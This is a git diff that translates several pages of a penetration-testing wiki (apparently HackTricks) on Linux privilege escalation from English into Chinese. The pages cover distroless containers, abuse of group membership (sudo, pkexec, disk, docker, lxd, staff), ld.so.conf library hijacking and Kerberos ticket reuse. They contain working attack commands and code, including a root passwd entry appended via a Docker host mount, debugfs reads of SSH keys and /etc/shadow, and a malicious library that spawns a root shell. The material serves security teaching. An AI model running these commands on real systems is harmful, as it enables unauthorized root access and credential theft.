seccomp:/home/smakam14/seccomp/profile.json busybox chmod 400 /etc/hosts chmod: /etc/hosts: Operation not permitted ``` - -Following output shows the “docker inspect” displaying the profile: - +以下输出显示了“docker inspect”显示的配置文件: ```json "SecurityOpt": [ - "seccomp:{\"defaultAction\":\"SCMP_ACT_ALLOW\",\"syscalls\":[{\"name\":\"chmod\",\"action\":\"SCMP_ACT_ERRNO\"}]}" - ] +"seccomp:{\"defaultAction\":\"SCMP_ACT_ALLOW\",\"syscalls\":[{\"name\":\"chmod\",\"action\":\"SCMP_ACT_ERRNO\"}]}" +] ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md b/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md index a733d5934..bd7e690a5 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md +++ b/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md @@ -2,29 +2,29 @@ {{#include ../../../banners/hacktricks-training.md}} -## What is Distroless +## 什么是 Distroless -A distroless container is a type of container that **contains only the necessary dependencies to run a specific application**, without any additional software or tools that are not required. These containers are designed to be as **lightweight** and **secure** as possible, and they aim to **minimize the attack surface** by removing any unnecessary components. +Distroless 容器是一种只包含 **运行特定应用程序所需的必要依赖项** 的容器,不包含任何不必要的软件或工具。这些容器旨在尽可能 **轻量** 和 **安全**,并旨在通过移除任何不必要的组件来 **最小化攻击面**。 -Distroless containers are often used in **production environments where security and reliability are paramount**. +Distroless 容器通常用于 **安全性和可靠性至关重要的生产环境**。 -Some **examples** of **distroless containers** are: +一些 **distroless 容器的例子** 包括: -- Provided by **Google**: [https://console.cloud.google.com/gcr/images/distroless/GLOBAL](https://console.cloud.google.com/gcr/images/distroless/GLOBAL) -- Provided by **Chainguard**: [https://github.com/chainguard-images/images/tree/main/images](https://github.com/chainguard-images/images/tree/main/images) +- 由 **Google** 提供: [https://console.cloud.google.com/gcr/images/distroless/GLOBAL](https://console.cloud.google.com/gcr/images/distroless/GLOBAL) +- 由 **Chainguard** 提供: [https://github.com/chainguard-images/images/tree/main/images](https://github.com/chainguard-images/images/tree/main/images) -## Weaponizing Distroless +## 武器化 Distroless -The goal of weaponize a distroless container is to be able to **execute arbitrary binaries and payloads even with the limitations** implied by **distroless** (lack of common binaries in the system) and also protections commonly found in containers such as **read-only** or **no-execute** in `/dev/shm`. +武器化 distroless 容器的目标是能够 **执行任意二进制文件和有效负载,即使在 distroless 所暗示的限制下**(系统中缺乏常见的二进制文件),以及容器中常见的保护措施,如 **只读** 或 **不可执行** 在 `/dev/shm` 中。 -### Through memory +### 通过内存 -Coming at some point of 2023... +将在 2023 年的某个时候... -### Via Existing binaries +### 通过现有二进制文件 #### openssl -\***\*[**In this post,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed\*\* by the software that is going to be running inside the container. +\***\*[**在这篇文章中,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) 解释了二进制文件 **`openssl`** 经常出现在这些容器中,可能是因为它是 **软件所需的**,该软件将在容器内运行。 {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index f34a6d548..65f2880a1 100644 --- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -1,13 +1,12 @@ -# Interesting Groups - Linux Privesc +# 有趣的组 - Linux 权限提升 {{#include ../../../banners/hacktricks-training.md}} -## Sudo/Admin Groups +## Sudo/管理员组 -### **PE - Method 1** - -**Sometimes**, **by default (or because some software needs it)** inside the **/etc/sudoers** file you can find some of these lines: +### **PE - 方法 1** +**有时**,**默认情况下(或因为某些软件需要它)**在 **/etc/sudoers** 文件中可以找到一些这些行: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL @@ -15,48 +14,36 @@ # Allow members of group admin to execute any command %admin ALL=(ALL:ALL) ALL ``` +这意味着 **任何属于 sudo 或 admin 组的用户都可以以 sudo 身份执行任何操作**。 -This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +如果是这种情况,要 **成为 root,你只需执行**: ``` sudo su ``` +### PE - 方法 2 -### PE - Method 2 - -Find all suid binaries and check if there is the binary **Pkexec**: - +查找所有 suid 二进制文件,并检查是否存在二进制文件 **Pkexec**: ```bash find / -perm -4000 2>/dev/null ``` - -If you find that the binary **pkexec is a SUID binary** and you belong to **sudo** or **admin**, you could probably execute binaries as sudo using `pkexec`.\ -This is because typically those are the groups inside the **polkit policy**. This policy basically identifies which groups can use `pkexec`. Check it with: - +如果你发现二进制文件 **pkexec 是一个 SUID 二进制文件**,并且你属于 **sudo** 或 **admin**,你可能可以使用 `pkexec` 以 sudo 身份执行二进制文件。\ +这是因为通常这些是 **polkit 策略** 中的组。该策略基本上识别哪些组可以使用 `pkexec`。使用以下命令检查: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` +在那里您将找到哪些组被允许执行 **pkexec**,并且在某些 Linux 发行版中,**sudo** 和 **admin** 组默认出现。 -There you will find which groups are allowed to execute **pkexec** and **by default** in some linux disctros the groups **sudo** and **admin** appear. - -To **become root you can execute**: - +要 **成为 root,您可以执行**: ```bash pkexec "/bin/sh" #You will be prompted for your user password ``` - -If you try to execute **pkexec** and you get this **error**: - +如果您尝试执行 **pkexec** 并且收到此 **错误**: ```bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED === Error executing command as another user: Not authorized ``` - -**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: - +**这不是因为你没有权限,而是因为你没有通过 GUI 连接**。对此问题有一个解决方法在这里: [https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)。你需要 **2 个不同的 ssh 会话**: ```bash:session1 echo $$ #Step1: Get current PID pkexec "/bin/bash" #Step 3, execute pkexec @@ -67,39 +54,31 @@ pkexec "/bin/bash" #Step 3, execute pkexec pkttyagent --process #Step 2, attach pkttyagent to session1 #Step 4, you will be asked in this session to authenticate to pkexec ``` - ## Wheel Group -**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: - +**有时**,**默认情况下**在 **/etc/sudoers** 文件中可以找到这一行: ``` %wheel ALL=(ALL:ALL) ALL ``` +这意味着 **属于 wheel 组的任何用户都可以以 sudo 身份执行任何操作**。 -This means that **any user that belongs to the group wheel can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +如果是这样,要 **成为 root,你只需执行**: ``` sudo su ``` - ## Shadow Group -Users from the **group shadow** can **read** the **/etc/shadow** file: - +来自 **group shadow** 的用户可以 **读取** **/etc/shadow** 文件: ``` -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow ``` +所以,阅读文件并尝试**破解一些哈希**。 -So, read the file and try to **crack some hashes**. +## 员工组 -## Staff Group - -**staff**: Allows users to add local modifications to the system (`/usr/local`) without needing root privileges (note that executables in `/usr/local/bin` are in the PATH variable of any user, and they may "override" the executables in `/bin` and `/usr/bin` with the same name). Compare with group "adm", which is more related to monitoring/security. [\[source\]](https://wiki.debian.org/SystemGroups) - -In debian distributions, `$PATH` variable show that `/usr/local/` will be run as the highest priority, whether you are a privileged user or not. +**staff**: 允许用户在不需要根权限的情况下对系统进行本地修改(`/usr/local`)(请注意,`/usr/local/bin`中的可执行文件在任何用户的PATH变量中,并且它们可能会“覆盖”`/bin`和`/usr/bin`中同名的可执行文件)。与更相关于监控/安全的“adm”组进行比较。 [\[source\]](https://wiki.debian.org/SystemGroups) +在debian发行版中,`$PATH`变量显示`/usr/local/`将以最高优先级运行,无论您是否是特权用户。 ```bash $ echo $PATH /usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games @@ -107,11 +86,9 @@ $ echo $PATH # echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ``` +如果我们可以劫持 `/usr/local` 中的一些程序,我们就可以轻松获得 root 权限。 -If we can hijack some programs in `/usr/local`, we can easy to get root. - -Hijack `run-parts` program is a way to easy to get root, because most of program will run a `run-parts` like (crontab, when ssh login). - +劫持 `run-parts` 程序是一种轻松获得 root 权限的方法,因为大多数程序会像 (crontab, 当 ssh 登录时) 一样运行 `run-parts`。 ```bash $ cat /etc/crontab | grep run-parts 17 * * * * root cd / && run-parts --report /etc/cron.hourly @@ -119,9 +96,7 @@ $ cat /etc/crontab | grep run-parts 47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; } 52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; } ``` - -or When a new ssh session login. - +或当一个新的ssh会话登录时。 ```bash $ pspy64 2024/02/01 22:02:08 CMD: UID=0 PID=1 | init [2] @@ -134,9 +109,7 @@ $ pspy64 2024/02/01 22:02:14 CMD: UID=0 PID=17890 | sshd: mane [priv] 2024/02/01 22:02:15 CMD: UID=0 PID=17891 | -bash ``` - -**Exploit** - +**利用** ```bash # 0x1 Add a run-parts script in /usr/local/bin/ $ vi /usr/local/bin/run-parts @@ -155,13 +128,11 @@ $ ls -la /bin/bash # 0x5 root it $ /bin/bash -p ``` +## 磁盘组 -## Disk Group - -This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. - -Files:`/dev/sd[a-z][1-9]` +此权限几乎**等同于根访问**,因为您可以访问机器内部的所有数据。 +文件:`/dev/sd[a-z][1-9]` ```bash df -h #Find where "/" is mounted debugfs /dev/sda1 @@ -170,57 +141,47 @@ debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` - -Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: - +请注意,使用 debugfs 您也可以 **写入文件**。例如,要将 `/tmp/asd1.txt` 复制到 `/tmp/asd2.txt`,您可以执行: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ``` +然而,如果你尝试**写入由 root 拥有的文件**(如 `/etc/shadow` 或 `/etc/passwd`),你将会遇到“**权限被拒绝**”错误。 -However, if you try to **write files owned by root** (like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error. - -## Video Group - -Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: +## 视频组 +使用命令 `w` 你可以找到**谁已登录系统**,它将显示如下输出: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` +**tty1** 表示用户 **yossi 正在物理登录** 到机器上的一个终端。 -The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. - -The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` - +**video group** 有权限查看屏幕输出。基本上,你可以观察屏幕。为了做到这一点,你需要 **抓取当前屏幕上的图像** 的原始数据,并获取屏幕使用的分辨率。屏幕数据可以保存在 `/dev/fb0`,你可以在 `/sys/class/graphics/fb0/virtual_size` 找到该屏幕的分辨率。 ```bash cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size ``` - -To **open** the **raw image** you can use **GIMP**, select the \*\*`screen.raw` \*\* file and select as file type **Raw image data**: +要**打开** **原始图像**,您可以使用**GIMP**,选择**`screen.raw`**文件,并选择文件类型为**原始图像数据**: ![](<../../../images/image (463).png>) -Then modify the Width and Height to the ones used on the screen and check different Image Types (and select the one that shows better the screen): +然后将宽度和高度修改为屏幕上使用的值,并检查不同的图像类型(并选择显示屏幕效果更好的那个): ![](<../../../images/image (317).png>) ## Root Group -It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... - -**Check which files root members can modify**: +看起来默认情况下**root组的成员**可以访问**修改**一些**服务**配置文件或一些**库**文件或**其他有趣的东西**,这些都可以用来提升权限... +**检查root成员可以修改哪些文件**: ```bash find / -group root -perm -g=w 2>/dev/null ``` +## Docker 组 -## Docker Group - -You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. - +您可以**将主机的根文件系统挂载到实例的卷**,因此当实例启动时,它会立即加载一个 `chroot` 到该卷。这实际上使您在机器上获得了 root 权限。 ```bash docker image #Get images from the docker service @@ -232,33 +193,32 @@ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/pa #Ifyou just want filesystem and network access you can startthe following container: docker run --rm -it --pid=host --net=host --privileged -v /:/mnt chroot /mnt bashbash ``` - -Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here: +最后,如果你不喜欢之前的任何建议,或者由于某种原因它们不起作用(docker api 防火墙?),你可以尝试**运行一个特权容器并从中逃逸**,如这里所述: {{#ref}} ../docker-security/ {{#endref}} -If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.** +如果你对 docker socket 有写权限,请阅读[**这篇关于如何利用 docker socket 升级权限的文章**](../#writable-docker-socket)**。** {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} -## lxc/lxd Group +## lxc/lxd 组 {{#ref}} ./ {{#endref}} -## Adm Group +## Adm 组 -Usually **members** of the group **`adm`** have permissions to **read log** files located inside _/var/log/_.\ -Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**. +通常,**`adm`** 组的**成员**有权限**读取**位于 _/var/log/_ 中的日志文件。\ +因此,如果你已经攻陷了该组中的用户,你应该确实**查看日志**。 -## Auth group +## Auth 组 -Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey**_ and _**/var/db/yubikey**_ if they are used.\ -These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) +在 OpenBSD 中,**auth** 组通常可以在 _**/etc/skey**_ 和 _**/var/db/yubikey**_ 文件夹中写入(如果它们被使用)。\ +这些权限可能会被以下漏洞利用,以**升级权限**到 root:[https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md index f308931ab..8c218f411 100644 --- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md @@ -1,15 +1,14 @@ -# lxd/lxc Group - Privilege escalation +# lxd/lxc 组 - 权限提升 {{#include ../../../banners/hacktricks-training.md}} -If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root +如果您属于 _**lxd**_ **或** _**lxc**_ **组**,您可以成为 root -## Exploiting without internet +## 无需互联网的利用 -### Method 1 - -You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github): +### 方法 1 +您可以在您的机器上安装这个发行版构建工具:[https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(按照 GitHub 的说明进行操作): ```bash sudo su # Install requirements @@ -34,9 +33,7 @@ sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18 ## Using build-lxc sudo $HOME/go/bin/distrobuilder build-lxc alpine.yaml -o image.release=3.18 ``` - -Upload the files **lxd.tar.xz** and **rootfs.squashfs**, add the image to the repo and create a container: - +上传文件 **lxd.tar.xz** 和 **rootfs.squashfs**,将镜像添加到仓库并创建一个容器: ```bash lxc image import lxd.tar.xz rootfs.squashfs --alias alpine @@ -51,23 +48,19 @@ lxc list lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true ``` - > [!CAUTION] -> If you find this error _**Error: No storage pool found. Please create a new storage pool**_\ -> Run **`lxd init`** and **repeat** the previous chunk of commands - -Finally you can execute the container and get root: +> 如果您发现此错误 _**错误:未找到存储池。请创建一个新的存储池**_\ +> 运行 **`lxd init`** 并 **重复** 之前的命令块 +最后,您可以执行容器并获取 root: ```bash lxc start privesc lxc exec privesc /bin/sh [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` +### 方法 2 -### Method 2 - -Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. - +构建一个 Alpine 镜像并使用标志 `security.privileged=true` 启动它,强制容器以 root 身份与主机文件系统交互。 ```bash # build a simple alpine image git clone https://github.com/saghul/lxd-alpine-builder @@ -87,5 +80,4 @@ lxc init myimage mycontainer -c security.privileged=true # mount the /root into the image lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/ld.so.conf-example.md b/src/linux-hardening/privilege-escalation/ld.so.conf-example.md index ab2683a9b..e87a58e29 100644 --- a/src/linux-hardening/privilege-escalation/ld.so.conf-example.md +++ b/src/linux-hardening/privilege-escalation/ld.so.conf-example.md @@ -2,82 +2,71 @@ {{#include ../../banners/hacktricks-training.md}} -## Prepare the environment +## 准备环境 -In the following section you can find the code of the files we are going to use to prepare the environment +在以下部分,您可以找到我们将用于准备环境的文件代码 {{#tabs}} {{#tab name="sharedvuln.c"}} - ```c #include #include "libcustom.h" int main(){ - printf("Welcome to my amazing application!\n"); - vuln_func(); - return 0; +printf("Welcome to my amazing application!\n"); +vuln_func(); +return 0; } ``` - {{#endtab}} {{#tab name="libcustom.h"}} - ```c #include void vuln_func(); ``` - {{#endtab}} {{#tab name="libcustom.c"}} - ```c #include void vuln_func() { - puts("Hi"); +puts("Hi"); } ``` - {{#endtab}} {{#endtabs}} -1. **Create** those files in your machine in the same folder -2. **Compile** the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c` -3. **Copy** `libcustom.so` to `/usr/lib`: `sudo cp libcustom.so /usr/lib` (root privs) -4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom` +1. **在**您的机器上在同一文件夹中**创建**这些文件 +2. **编译**该**库**: `gcc -shared -o libcustom.so -fPIC libcustom.c` +3. **复制** `libcustom.so` 到 `/usr/lib`: `sudo cp libcustom.so /usr/lib` (root privs) +4. **编译**该**可执行文件**: `gcc sharedvuln.c -o sharedvuln -lcustom` -### Check the environment - -Check that _libcustom.so_ is being **loaded** from _/usr/lib_ and that you can **execute** the binary. +### 检查环境 +检查 _libcustom.so_ 是否从 _/usr/lib_ 被**加载**,并且您可以**执行**该二进制文件。 ``` $ ldd sharedvuln - linux-vdso.so.1 => (0x00007ffc9a1f7000) - libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000) - /lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) +linux-vdso.so.1 => (0x00007ffc9a1f7000) +libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000) +/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) $ ./sharedvuln Welcome to my amazing application! Hi ``` - ## Exploit -In this scenario we are going to suppose that **someone has created a vulnerable entry** inside a file in _/etc/ld.so.conf/_: - +在这个场景中,我们将假设**某人已在 _/etc/ld.so.conf/_ 文件中创建了一个易受攻击的条目**: ```bash sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf ``` - -The vulnerable folder is _/home/ubuntu/lib_ (where we have writable access).\ -**Download and compile** the following code inside that path: - +易受攻击的文件夹是 _/home/ubuntu/lib_(我们具有可写访问权限)。\ +**下载并编译**以下代码到该路径: ```c //gcc -shared -o libcustom.so -fPIC libcustom.c @@ -86,27 +75,23 @@ The vulnerable folder is _/home/ubuntu/lib_ (where we have writable access).\ #include void vuln_func(){ - setuid(0); - setgid(0); - printf("I'm the bad library\n"); - system("/bin/sh",NULL,NULL); +setuid(0); +setgid(0); +printf("I'm the bad library\n"); +system("/bin/sh",NULL,NULL); } ``` +现在我们已经**在错误配置的**路径中创建了恶意的 libcustom 库,我们需要等待**重启**或等待 root 用户执行 **`ldconfig`**(_如果您可以作为 **sudo** 执行此二进制文件,或者它具有 **suid 位**,您将能够自己执行它_)。 -Now that we have **created the malicious libcustom library inside the misconfigured** path, we need to wait for a **reboot** or for the root user to execute **`ldconfig`** (_in case you can execute this binary as **sudo** or it has the **suid bit** you will be able to execute it yourself_). - -Once this has happened **recheck** where is the `sharevuln` executable loading the `libcustom.so` library from: - +一旦发生这种情况,请**重新检查** `sharevuln` 可执行文件从哪里加载 `libcustom.so` 库: ```c $ldd sharedvuln - linux-vdso.so.1 => (0x00007ffeee766000) - libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000) - /lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) +linux-vdso.so.1 => (0x00007ffeee766000) +libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000) +/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) ``` - -As you can see it's **loading it from `/home/ubuntu/lib`** and if any user executes it, a shell will be executed: - +正如您所看到的,它是**从 `/home/ubuntu/lib` 加载的**,如果任何用户执行它,将会执行一个 shell: ```c $ ./sharedvuln Welcome to my amazing application! @@ -114,40 +99,35 @@ I'm the bad library $ whoami ubuntu ``` - > [!NOTE] -> Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges. +> 请注意,在这个例子中我们没有提升权限,但通过修改执行的命令并**等待 root 或其他特权用户执行易受攻击的二进制文件**,我们将能够提升权限。 -### Other misconfigurations - Same vuln +### 其他错误配置 - 相同漏洞 -In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\ -But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it. +在前面的例子中,我们伪造了一个错误配置,其中管理员**在 `/etc/ld.so.conf.d/` 中的配置文件内设置了一个非特权文件夹**。\ +但是还有其他错误配置可能导致相同的漏洞,如果您在 `/etc/ld.so.conf.d` 中的某个**配置文件**、文件夹 `/etc/ld.so.conf.d` 或文件 `/etc/ld.so.conf` 中具有**写权限**,您可以配置相同的漏洞并进行利用。 -## Exploit 2 - -**Suppose you have sudo privileges over `ldconfig`**.\ -You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders.\ -So, lets create the files and folders needed to load "/tmp": +## 利用 2 +**假设您对 `ldconfig` 具有 sudo 权限**。\ +您可以指示 `ldconfig` **从哪里加载配置文件**,因此我们可以利用它使 `ldconfig` 加载任意文件夹。\ +所以,让我们创建加载 "/tmp" 所需的文件和文件夹: ```bash cd /tmp echo "include /tmp/conf/*" > fake.ld.so.conf echo "/tmp" > conf/evil.conf ``` - -Now, as indicated in the **previous exploit**, **create the malicious library inside `/tmp`**.\ -And finally, lets load the path and check where is the binary loading the library from: - +现在,如**之前的漏洞**所示,**在 `/tmp` 中创建恶意库**。\ +最后,让我们加载路径并检查二进制文件从哪里加载库: ```bash ldconfig -f fake.ld.so.conf ldd sharedvuln - linux-vdso.so.1 => (0x00007fffa2dde000) - libcustom.so => /tmp/libcustom.so (0x00007fcb07756000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000) - /lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) +linux-vdso.so.1 => (0x00007fffa2dde000) +libcustom.so => /tmp/libcustom.so (0x00007fcb07756000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000) +/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) ``` - -**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.** +**正如您所看到的,拥有 `ldconfig` 的 sudo 权限,您可以利用相同的漏洞。** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/linux-active-directory.md b/src/linux-hardening/privilege-escalation/linux-active-directory.md index 5e355bae5..e29529589 100644 --- a/src/linux-hardening/privilege-escalation/linux-active-directory.md +++ b/src/linux-hardening/privilege-escalation/linux-active-directory.md @@ -2,19 +2,17 @@ {{#include ../../banners/hacktricks-training.md}} -{% embed url="https://websec.nl/" %} +一台 Linux 机器也可以存在于 Active Directory 环境中。 -A linux machine can also be present inside an Active Directory environment. +在 AD 中的 Linux 机器可能会 **在文件中存储不同的 CCACHE 票证。这些票证可以像其他 kerberos 票证一样被使用和滥用**。为了读取这些票证,您需要是票证的用户所有者或 **root** 用户。 -A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine. +## 枚举 -## Enumeration +### 从 Linux 进行 AD 枚举 -### AD enumeration from linux +如果您在 Linux(或 Windows 的 bash)中访问 AD,您可以尝试 [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) 来枚举 AD。 -If you have access over an AD in linux (or bash in Windows) you can try [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) to enumerate the AD. - -You can also check the following page to learn **other ways to enumerate AD from linux**: +您还可以查看以下页面以了解 **从 Linux 枚举 AD 的其他方法**: {{#ref}} ../../network-services-pentesting/pentesting-ldap.md @@ -22,28 +20,27 @@ You can also check the following page to learn **other ways to enumerate AD from ### FreeIPA -FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in: +FreeIPA 是一个开源的 **替代方案**,用于 Microsoft Windows **Active Directory**,主要针对 **Unix** 环境。它结合了一个完整的 **LDAP 目录** 和一个 MIT **Kerberos** 密钥分发中心,管理方式类似于 Active Directory。利用 Dogtag **证书系统**进行 CA 和 RA 证书管理,支持 **多因素** 身份验证,包括智能卡。集成了 SSSD 以支持 Unix 身份验证过程。了解更多信息: {{#ref}} ../freeipa-pentesting.md {{#endref}} -## Playing with tickets +## 玩票证 ### Pass The Ticket -In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack: +在此页面中,您将找到不同的地方,您可以 **在 Linux 主机中找到 kerberos 票证**,在以下页面中,您可以了解如何将这些 CCache 票证格式转换为 Kirbi(您在 Windows 中需要使用的格式),以及如何执行 PTT 攻击: {{#ref}} ../../windows-hardening/active-directory-methodology/pass-the-ticket.md {{#endref}} -### CCACHE ticket reuse from /tmp +### 从 /tmp 重用 CCACHE 票证 -CCACHE files are binary formats for **storing Kerberos credentials** are typically stored with 600 permissions in `/tmp`. These files can be identified by their **name format, `krb5cc_%{uid}`,** correlating to the user's UID. For authentication ticket verification, the **environment variable `KRB5CCNAME`** should be set to the path of the desired ticket file, enabling its reuse. - -List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be **reused by setting the environment variable** with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. +CCACHE 文件是用于 **存储 Kerberos 凭据** 的二进制格式,通常以 600 权限存储在 `/tmp` 中。这些文件可以通过其 **名称格式 `krb5cc_%{uid}`** 进行识别,与用户的 UID 相关联。为了验证身份验证票证,**环境变量 `KRB5CCNAME`** 应设置为所需票证文件的路径,以便启用其重用。 +使用 `env | grep KRB5CCNAME` 列出当前用于身份验证的票证。该格式是可移植的,票证可以通过设置环境变量 **重用**,使用 `export KRB5CCNAME=/tmp/ticket.ccache`。Kerberos 票证名称格式为 `krb5cc_%{uid}`,其中 uid 是用户 UID。 ```bash # Find tickets ls /tmp/ | grep krb5cc @@ -52,79 +49,62 @@ krb5cc_1000 # Prepare to use it export KRB5CCNAME=/tmp/krb5cc_1000 ``` +### CCACHE 票据重用来自密钥环 -### CCACHE ticket reuse from keyring - -**Kerberos tickets stored in a process's memory can be extracted**, particularly when the machine's ptrace protection is disabled (`/proc/sys/kernel/yama/ptrace_scope`). A useful tool for this purpose is found at 